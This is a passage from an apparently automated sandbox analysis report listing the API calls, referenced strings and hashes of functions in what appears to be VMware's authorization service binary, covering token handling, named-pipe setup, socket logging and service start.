ed74ea-ed751e GetTokenInformation 520->532 533 ed7534-ed754a free * 2 520->533 521->469 522->521 523->487 534 ed754c-ed7553 532->534 535 ed7520-ed7531 GetLastError Warning 532->535 533->469 534->533 536 ed7555-ed759c Warning * 2 call ed27c0 free * 4 534->536 535->533 536->469
                                                    APIs
                                                    • memset.VCRUNTIME140(?,00000000,00000044,?,00000000,00ED13A6), ref: 00ED6F17
                                                    • EnterCriticalSection.KERNEL32(00EE1098,?,00000000,00ED13A6), ref: 00ED6F41
                                                    • EnterCriticalSection.KERNEL32(00EE1098,?,00000000,00ED13A6), ref: 00ED6F7D
                                                    • memcpy.VCRUNTIME140(?,?,00000000,?,00000000,00ED13A6), ref: 00ED6F95
                                                    • LeaveCriticalSection.KERNEL32(00EE1098,?,?,?,?,00000000,00ED13A6), ref: 00ED6F9E
                                                    • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),?,00000400,00000000,?,?,?,?,00000000,00ED13A6), ref: 00ED6FDD
                                                    • GetLastError.KERNEL32(?,?,?,?,00000000,00ED13A6), ref: 00ED6FED
                                                    • Warning.VMWAREBASE(Token %x user info query failed (err %d len %d),?,00000000,00000000,?,?,?,?,00000000,00ED13A6), ref: 00ED6FFB
                                                    • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),?,00000400,00000000,?,?,?,?,00000000,00ED13A6), ref: 00ED702B
                                                    • EqualSid.ADVAPI32(?,?,?,?,?,?,00000000,00ED13A6), ref: 00ED7041
                                                    • LeaveCriticalSection.KERNEL32(00EE1098,?,00000000,00ED13A6), ref: 00ED7095
                                                    • Warning.VMWAREBASE(Reusing existing session,?,00000000,00ED13A6), ref: 00ED70B2
                                                    • Warning.VMWAREBASE(Allocating a new session,?,00000000,00ED13A6), ref: 00ED70D7
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000002,CreateLogonSessionInfo failed,?,?,?,?,00000000,00ED13A6), ref: 00ED7104
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,00000000,00ED13A6), ref: 00ED710C
                                                    • DuplicateTokenEx.ADVAPI32(?,000F01FF,00000000,00000002,00000001,00000000,?,?,?,?,00000000,00ED13A6), ref: 00ED7159
                                                    • GetLastError.KERNEL32(?,?,?,?,00000000,00ED13A6), ref: 00ED7163
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000002,DuplcateTokenEx failed: %d.,00000000,?,?,?,?,00000000,00ED13A6), ref: 00ED7178
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,00000000,00ED13A6), ref: 00ED7180
                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000001,00004000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 00ED71E1
                                                    • GetLastError.KERNEL32(?,?,?,?,00000000,00ED13A6), ref: 00ED71EB
                                                    • Warning.VMWAREBASE(%s: AllocateAndInitializeSid failed: %u,SetTokenIntegrityLevel,00000000,?,?,?,?,00000000,00ED13A6), ref: 00ED71FC
                                                    • SetTokenInformation.ADVAPI32(00000000,00000019,?,00000008,?,?,?,?,00000000,00ED13A6), ref: 00ED7228
                                                    • GetLastError.KERNEL32(?,?,?,?,00000000,00ED13A6), ref: 00ED7232
                                                    • Warning.VMWAREBASE(%s: SetTokenInformation failed: %u,SetTokenIntegrityLevel,00000000,?,?,?,?,00000000,00ED13A6), ref: 00ED7243
                                                    • FreeSid.ADVAPI32(00000000,?,?,?,?,00000000,00ED13A6), ref: 00ED725A
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000002,SetTokenIntegrityLevel failed.,?,?,?,?,00000000,00ED13A6), ref: 00ED7272
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,00000000,00ED13A6), ref: 00ED727A
                                                    • Warning.VMWAREBASE(?,?,?,?,?,00000000,00ED13A6), ref: 00ED728F
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000002,Before: File_GetNTGlobalFinalPath failed for %s: %d,?,00000000,?,?,?,?,?,00000000,00ED13A6), ref: 00ED72B2
                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000,00ED13A6), ref: 00ED729D
                                                      • Part of subcall function 00ED27C0: GetLastError.KERNEL32(?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27D8
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27F3
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00EDA850,?,?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?), ref: 00ED2807
                                                      • Part of subcall function 00ED27C0: _printf.MSPDB140-MSVCRT ref: 00ED2824
                                                      • Part of subcall function 00ED27C0: SetLastError.KERNEL32(00000000,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED282D
                                                    • ImpersonateLoggedOnUser.ADVAPI32(00000000,?,?,?,?,?,00000000,00ED13A6), ref: 00ED72C4
                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000,00ED13A6), ref: 00ED72CE
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00ED75BF
                                                    • Warning.VMWAREBASE(?,?,Process creation failed), ref: 00ED75D6
                                                    • TerminateProcess.KERNEL32(?,00000000), ref: 00ED7602
                                                    • CloseHandle.KERNEL32(?), ref: 00ED760E
                                                    • CloseHandle.KERNEL32(?), ref: 00ED762D
                                                    • CloseHandle.KERNEL32(00000000), ref: 00ED764B
                                                    Strings
                                                    • %s: SetTokenInformation failed: %u, xrefs: 00ED723E
                                                    • @&!*@*@(msg.authd.termServLaunchFailureWS)Cannot power on the virtual machine. This may be because you are running inside a Terminal Services or Remote Desktop session or are in Fast User Switch Mode.For more information, refer to our Web site at "%s"., xrefs: 00ED7564
                                                    • Token %x user info query failed (err %d len %d), xrefs: 00ED6FF6
                                                    • ImpersonateLoggedOnUser failed: %d, xrefs: 00ED72D5
                                                    • SetTokenIntegrityLevel, xrefs: 00ED71F2, 00ED7239
                                                    • Failed to validate vmx file "%s", abort to launch it., xrefs: 00ED732D
                                                    • D, xrefs: 00ED7138
                                                    • SetTokenIntegrityLevel failed., xrefs: 00ED7264
                                                    • Process creation failed, xrefs: 00ED75C8
                                                    • Allocating a new session, xrefs: 00ED70D2
                                                    • DuplcateTokenEx failed: %d., xrefs: 00ED716A
                                                    • @, xrefs: 00ED6F1F
                                                    • `, xrefs: 00ED721E
                                                    • CreateProcessAsUser: The system cannot find the file "%s" (code: %d)., xrefs: 00ED75A6
                                                    • Reusing existing session, xrefs: 00ED70AD
                                                    • Before: File_GetNTGlobalFinalPath failed for %s: %d, xrefs: 00ED72A5
                                                    • After: File_GetNTGlobalFinalPath failed for %s : %d., xrefs: 00ED7304
                                                    • SetProcessWorkingSetSite failed: %d, xrefs: 00ED743C
                                                    • GlobalMemoryStatusEx failed: %d, xrefs: 00ED73E5
                                                    • CreateLogonSessionInfo failed, xrefs: 00ED70F6
                                                    • Could not get session ID of user's token: %d., xrefs: 00ED7527
                                                    • RevertToSelf failed: %d, xrefs: 00ED6E92
                                                    • %s: AllocateAndInitializeSid failed: %u, xrefs: 00ED71F7
                                                    • CreateProcessAsUser failed: %d, xrefs: 00ED74B4
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$ErrorLastfree$CriticalSectionToken$CloseHandleInformation$EnterLeave$AllocateDuplicateEqualFreeImpersonateInitializeLoggedProcessTerminateUser_printfmemcpymemset
                                                    • String ID: %s: AllocateAndInitializeSid failed: %u$%s: SetTokenInformation failed: %u$@$@&!*@*@(msg.authd.termServLaunchFailureWS)Cannot power on the virtual machine. This may be because you are running inside a Terminal Services or Remote Desktop session or are in Fast User Switch Mode.For more information, refer to our Web site at "%s".$After: File_GetNTGlobalFinalPath failed for %s : %d.$Allocating a new session$Before: File_GetNTGlobalFinalPath failed for %s: %d$Could not get session ID of user's token: %d.$CreateLogonSessionInfo failed$CreateProcessAsUser failed: %d$CreateProcessAsUser: The system cannot find the file "%s" (code: %d).$D$DuplcateTokenEx failed: %d.$Failed to validate vmx file "%s", abort to launch it.$GlobalMemoryStatusEx failed: %d$ImpersonateLoggedOnUser failed: %d$Process creation failed$Reusing existing session$RevertToSelf failed: %d$SetProcessWorkingSetSite failed: %d$SetTokenIntegrityLevel$SetTokenIntegrityLevel failed.$Token %x user info query failed (err %d len %d)$`
                                                    • API String ID: 3795865327-499625960
                                                    • Opcode ID: 105d8c1e77241312efaac4b0f58981126416d2e8621c5bb4d645d91da09efa9d
                                                    • Instruction ID: 7ca5e962403a20077c445115eeae723ed40fc004519aeb07db75331aebbb975b
                                                    • Opcode Fuzzy Hash: 105d8c1e77241312efaac4b0f58981126416d2e8621c5bb4d645d91da09efa9d
                                                    • Instruction Fuzzy Hash: 7912E4B09022199FEB219B61ED49BAE77B8EF44304F0410E7F509B2292D7759F85CF62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED4850 Relevance: 89.5, APIs: 39, Strings: 12, Instructions: 253memorypipeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • AllocateAndInitializeSid.ADVAPI32(00ED45FC,00000001,0000000B,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00ED4892
                                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000400,00000001,?,?,?,?,?,?,?,?,00ED45FC), ref: 00ED489F
                                                    • InitializeAcl.ADVAPI32(00000000,00000400,00000002,?,?,?,?,?,?,?,?,00ED45FC), ref: 00ED48CF
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00ED45FC), ref: 00ED48D9
                                                    • Warning.VMWAREBASE(00000000,?,?,?,?,?,?,?,?,00ED45FC), ref: 00ED48E0
                                                    • FreeSid.ADVAPI32(?), ref: 00ED4A6D
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED4A78
                                                    • LocalFree.KERNEL32(00000000), ref: 00ED4A86
                                                    • CloseHandle.KERNEL32(00000000), ref: 00ED4A91
                                                    • ConnectNamedPipe.KERNEL32(00000000,?), ref: 00ED4AC6
                                                    • GetLastError.KERNEL32 ref: 00ED4AD0
                                                    • GetLastError.KERNEL32 ref: 00ED4ADD
                                                    • Warning.VMWAREBASE(00000000), ref: 00ED4AE4
                                                    • CloseHandle.KERNEL32(00000000), ref: 00ED4AA2
                                                      • Part of subcall function 00ED27C0: GetLastError.KERNEL32(?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27D8
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27F3
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00EDA850,?,?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?), ref: 00ED2807
                                                      • Part of subcall function 00ED27C0: _printf.MSPDB140-MSVCRT ref: 00ED2824
                                                      • Part of subcall function 00ED27C0: SetLastError.KERNEL32(00000000,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED282D
                                                    • FreeSid.ADVAPI32(?), ref: 00ED4B14
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED4B1B
                                                    • LocalFree.KERNEL32(00000000), ref: 00ED4B25
                                                    Strings
                                                    • InitializeSecurityDescriptor failed: %s (%d) , xrefs: 00ED497F
                                                    • Generated SD is invalid: %s (%d) , xrefs: 00ED49C8
                                                    • SetSecurityDescriptorDacl failed: %s (%d) , xrefs: 00ED49A6
                                                    • Could not add sid to ACL: %s (%d) , xrefs: 00ED4912
                                                    • \\.\pipe\vmware-authdpipe, xrefs: 00ED49F5
                                                    • Generated ACL is invalid: %s (%d) , xrefs: 00ED4934
                                                    • LocalAlloc pSD failed while creating pipe, xrefs: 00ED4951
                                                    • ConnectNamedPipe failed: %s (%d) , xrefs: 00ED4AEA
                                                    • Could not allocate %d bytes for ACL, xrefs: 00ED48B3
                                                    • CreateNamedPipe failed: %s (%d) , xrefs: 00ED4A1A
                                                    • Could not create event for overlapped IO: %s (%d) , xrefs: 00ED4A56
                                                    • Could not initialize ACL: %s (%d) , xrefs: 00ED48E6
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$FreeWarning$CloseHandleInitializeLocalfree$AllocateConnectNamedPipe_printfcalloc
                                                    • String ID: ConnectNamedPipe failed: %s (%d) $Could not add sid to ACL: %s (%d) $Could not allocate %d bytes for ACL$Could not create event for overlapped IO: %s (%d) $Could not initialize ACL: %s (%d) $CreateNamedPipe failed: %s (%d) $Generated ACL is invalid: %s (%d) $Generated SD is invalid: %s (%d) $InitializeSecurityDescriptor failed: %s (%d) $LocalAlloc pSD failed while creating pipe$SetSecurityDescriptorDacl failed: %s (%d) $\\.\pipe\vmware-authdpipe
                                                    • API String ID: 1190025680-572978193
                                                    • Opcode ID: 15e41d8809b7f19a50d2491026efc852ce52697fc85b88f5d969eef917ea4f0e
                                                    • Instruction ID: 44536319c9b4bcef376f8da0ef3c7f5c93b4882413711e146176883125e4fecb
                                                    • Opcode Fuzzy Hash: 15e41d8809b7f19a50d2491026efc852ce52697fc85b88f5d969eef917ea4f0e
                                                    • Instruction Fuzzy Hash: A681A6B0A41301AFD710AFB1BD4AFAE77A8EF18705F045127F601F63C1EB758A068666
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED6810 Relevance: 86.0, APIs: 34, Strings: 15, Instructions: 281COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,00000020,00000001,00000000), ref: 00ED6871
                                                    • GetCurrentProcess.KERNEL32(?), ref: 00ED689B
                                                    • GetCurrentProcess.KERNEL32 ref: 00ED68A3
                                                    • DuplicateHandle.KERNEL32(00000000,?,00000000,00000004,00000000,00000000,00000002), ref: 00ED68B8
                                                    • GetLastError.KERNEL32 ref: 00ED68C2
                                                    • DestroyEnvironmentBlock.USERENV(00000000,?,00000000), ref: 00ED6B44
                                                    • DestroyEnvironmentBlock.USERENV(00000000,?,00000000), ref: 00ED6B54
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000), ref: 00ED6B76
                                                    • UnloadUserProfile.USERENV(?,?,?,00000000), ref: 00ED6B91
                                                    • CloseHandle.KERNEL32(?,?,00000000), ref: 00ED6BA1
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(-00000001), ref: 00ED6BAF
                                                      • Part of subcall function 00ED27C0: GetLastError.KERNEL32(?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27D8
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27F3
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00EDA850,?,?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?), ref: 00ED2807
                                                      • Part of subcall function 00ED27C0: _printf.MSPDB140-MSVCRT ref: 00ED2824
                                                      • Part of subcall function 00ED27C0: SetLastError.KERNEL32(00000000,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED282D
                                                    • GetLastError.KERNEL32 ref: 00ED6BCE
                                                      • Part of subcall function 00ED2700: Warning.VMWAREBASE(?,00001000,?,00ED6E9C,?,00ED6E9C,RevertToSelf failed: %d,00000000), ref: 00ED273F
                                                    Strings
                                                    • DuplicateHandle failed: %d, xrefs: 00ED68C9
                                                    • (Account %s administrator), xrefs: 00ED6996
                                                    • ImpersonateLoggedOnUser failed: %d, xrefs: 00ED6905
                                                    • CreateEnvironmentBlock(NULL) failed: %d, xrefs: 00ED6A0A
                                                    • GetUserName failed: %d, xrefs: 00ED6948
                                                    • calloc failed, xrefs: 00ED6880
                                                    • The system environment block appears to be corrupted. Please fix your environment block and try again., xrefs: 00ED69EF
                                                    • GetEnvironmentStrings() failed: %d, xrefs: 00ED69BC
                                                    • CreateLogonSession: spawn with username: %s, xrefs: 00ED696F
                                                    • is NOT, xrefs: 00ED6988
                                                    • CreateEnvironmentBlock(hToken) failed: %d, xrefs: 00ED6A86
                                                    • Your environment block appears to be corrupted. Please fix your environment block and try again., xrefs: 00ED6A6E
                                                    • , xrefs: 00ED68E3
                                                    • RevertToSelf failed: %d, xrefs: 00ED6BD5
                                                    • LoadUserProfile failed: %d, xrefs: 00ED6A37
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$Warning$BlockCurrentDestroyEnvironmentHandleProcessfree$CloseDuplicateProfileUnloadUser_printfcalloc
                                                    • String ID: $ (Account %s administrator)$CreateEnvironmentBlock(NULL) failed: %d$CreateEnvironmentBlock(hToken) failed: %d$CreateLogonSession: spawn with username: %s$DuplicateHandle failed: %d$GetEnvironmentStrings() failed: %d$GetUserName failed: %d$ImpersonateLoggedOnUser failed: %d$LoadUserProfile failed: %d$RevertToSelf failed: %d$The system environment block appears to be corrupted. Please fix your environment block and try again.$Your environment block appears to be corrupted. Please fix your environment block and try again.$calloc failed$is NOT
                                                    • API String ID: 943474365-2635470652
                                                    • Opcode ID: 98c701928ec86d9061b870f3db03153994fed76be6bda50bf5572fac20a05609
                                                    • Instruction ID: 1a222b0bbd8cbc4485c2d2ee08f8feb748e99befc8694bab460a83caf59ec60b
                                                    • Opcode Fuzzy Hash: 98c701928ec86d9061b870f3db03153994fed76be6bda50bf5572fac20a05609
                                                    • Instruction Fuzzy Hash: A5A1C671A013149FDB205F61AC4AB6977B8FF14704F0891ABF945F6381EB718E46CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED2DF0 Relevance: 68.5, APIs: 26, Strings: 13, Instructions: 261synchronizationCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Warning.VMWAREBASE(00000000,?,00000104,?,?), ref: 00ED2E4C
                                                    • Warning.VMWAREBASE(00000000,00000000,?,00000000,?,00000104,?,?), ref: 00ED2E5C
                                                    • GetLastError.KERNEL32(?,?,?,?,?), ref: 00ED2E70
                                                      • Part of subcall function 00ED3B70: Warning.VMWAREBASE(?,00000400,?,?), ref: 00ED3B96
                                                    • WaitForSingleObject.KERNEL32(00000000,00ED17F1,?,?,?,?,?), ref: 00ED2EA0
                                                    • ReleaseMutex.KERNEL32(?), ref: 00ED31B2
                                                    • CloseHandle.KERNEL32(?), ref: 00ED31B9
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED31C5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$CloseErrorHandleLastMutexObjectReleaseSingleWaitfree
                                                    • String ID: -fd$Can't create mutex '%s' (%d)$Connect %s$Could not open %s process %d. (error %d)$Error connecting to vmx process.$Global$No such %s process: %s$Start %s$There is no %s process running for config file %s$Timeout acquiring thread lock.$VMAuthdPassFD: DuplicateHandle failed (%d).$VMAuthdPassFD: ImpersonateLoggedOnUser failed (%d).$VMware
                                                    • API String ID: 3389854180-4036884118
                                                    • Opcode ID: 006501ff70b244392cd76cbcf62ce281e00d0252d4f45511501ee4827021ccde
                                                    • Instruction ID: f4884ebb0641396ce8c771a99029a2f073c6d42069b41bed4627c47483ddb472
                                                    • Opcode Fuzzy Hash: 006501ff70b244392cd76cbcf62ce281e00d0252d4f45511501ee4827021ccde
                                                    • Instruction Fuzzy Hash: DDA1B6B1A41219BBDB209B74DC4AFEAB7A8EB14704F0411A7F518B63C1D7709E468F62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED20B0 Relevance: 61.4, APIs: 17, Strings: 18, Instructions: 181networkthreadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • memset.VCRUNTIME140(?,00000000,00000118,00000000,?,vmware-vmx-stats.exe), ref: 00ED20D4
                                                      • Part of subcall function 00ED27C0: GetLastError.KERNEL32(?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27D8
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27F3
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00EDA850,?,?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?), ref: 00ED2807
                                                      • Part of subcall function 00ED27C0: _printf.MSPDB140-MSVCRT ref: 00ED2824
                                                      • Part of subcall function 00ED27C0: SetLastError.KERNEL32(00000000,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED282D
                                                      • Part of subcall function 00ED32A0: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,00ED2119,?,?,00000006,start,security.host.ruissl,?,?,00000000,00000118), ref: 00ED32CF
                                                      • Part of subcall function 00ED32A0: GetLastError.KERNEL32(?,00ED2119,?,?,00000006,start,security.host.ruissl,?,?,00000000,00000118,00000000,?,vmware-vmx-stats.exe), ref: 00ED32DC
                                                    • getpeername.WS2_32(?,?,?), ref: 00ED2146
                                                    • GetCurrentThreadId.KERNEL32 ref: 00ED214F
                                                    • WSAGetLastError.WS2_32(00000000,?,?,?,?,?,?,00000000,?,vmware-vmx-stats.exe), ref: 00ED2156
                                                    • Warning.VMWAREBASE(Connect from (local) AF_UNIX socket.,?,?,?,?,?,?,00000000,?,vmware-vmx-stats.exe), ref: 00ED2172
                                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(Connect from (local) AF_UNIX socket.,?,?,?,?,?,?,00000000,?,vmware-vmx-stats.exe), ref: 00ED217D
                                                    • inet_ntoa.WS2_32(?), ref: 00ED219C
                                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,00000000,?,vmware-vmx-stats.exe), ref: 00ED21A2
                                                    • htonl.WS2_32(7F000001), ref: 00ED21B6
                                                    • Warning.VMWAREBASE(Connect from local (loopback) socket.,?,?,?,?,?,?,?,00000000,?,vmware-vmx-stats.exe), ref: 00ED21C4
                                                    • htons.WS2_32(?), ref: 00ED21D8
                                                    • getsockname.WS2_32(?,00000001,00000010), ref: 00ED21F5
                                                    • GetCurrentThreadId.KERNEL32 ref: 00ED21FE
                                                    • WSAGetLastError.WS2_32(00000000,?,?,?,?,?,?,?,00000000,?,vmware-vmx-stats.exe), ref: 00ED2205
                                                    • Warning.VMWAREBASE(Connect from %s socket (%s:%u).,remote,?,vmware-vmx-stats.exe,?,?,?,?,?,?,?,00000000,?,vmware-vmx-stats.exe), ref: 00ED223B
                                                    • Warning.VMWAREBASE(Connect from %.128s,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,vmware-vmx-stats.exe), ref: 00ED224E
                                                    • Warning.VMWAREBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00ED2284
                                                      • Part of subcall function 00ED1F10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00ED1F33
                                                      • Part of subcall function 00ED1F10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00ED1F51
                                                      • Part of subcall function 00ED1F10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?), ref: 00ED1F76
                                                      • Part of subcall function 00ED1F10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00ED1F7F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$ErrorLast$free$CurrentThread_strdup$CreateEvent_printfgetpeernamegetsocknamehtonlhtonsinet_ntoamemset
                                                    • String ID: Connect from %.128s$Connect from %s socket (%s:%u).$Connect from (local) AF_UNIX socket.$Connect from local (loopback) socket.$Failed$Goodbye$NOT_REACHED %s:%d$SSL connection %s$Succeeded$Using plaintext connection$bora\apps\vmauthd\vmauthd.c$getpeername failed: %d tid %d$getsockname failed: %d tid %d$local$remote$security.host.ruissl$start$vmware-vmx-stats.exe
                                                    • API String ID: 988671846-1981099636
                                                    • Opcode ID: 95f0f38bfeefd840f47d6288cb885011788945276ab4a389001197b4383c91b8
                                                    • Instruction ID: f7c7fcedbdfc77be3e9b952e6d242a3df5783ddf5a04a3f353ef8ca0afd99dd8
                                                    • Opcode Fuzzy Hash: 95f0f38bfeefd840f47d6288cb885011788945276ab4a389001197b4383c91b8
                                                    • Instruction Fuzzy Hash: 1A51A6B1E002057EDB1077B09C47BEE76A8EB14704F086167FA04B6392D7756B9787A3
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED5C70 Relevance: 51.0, APIs: 22, Strings: 7, Instructions: 221sleepserviceCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Warning.VMWAREBASE(?,?,VMAuthdStartService failed to lookup service tag: %s,?,?,?,00000000), ref: 00ED5CEC
                                                    • Warning.VMWAREBASE(00000000,00000000,000F003F,?,?,00000000), ref: 00ED5D10
                                                    • GetLastError.KERNEL32(?,?,00000000), ref: 00ED5D1C
                                                    • Warning.VMWAREBASE(00000000,?,00000000), ref: 00ED5D23
                                                    • Warning.VMWAREBASE(?,?,OpenSCManager failed: %s (%d),00000000,00000000,?,00000000), ref: 00ED5D35
                                                    • Warning.VMWAREBASE(00000000,00000000,00000014,?,?,00000000), ref: 00ED5D54
                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00ED5D62
                                                    • Warning.VMWAREBASE(00000000,?,?,?,?,?,00000000), ref: 00ED5D69
                                                    • Warning.VMWAREBASE(?,?,StartService(%s) failed: %s (%d),00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 00ED5D7C
                                                    • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 00ED5D9C
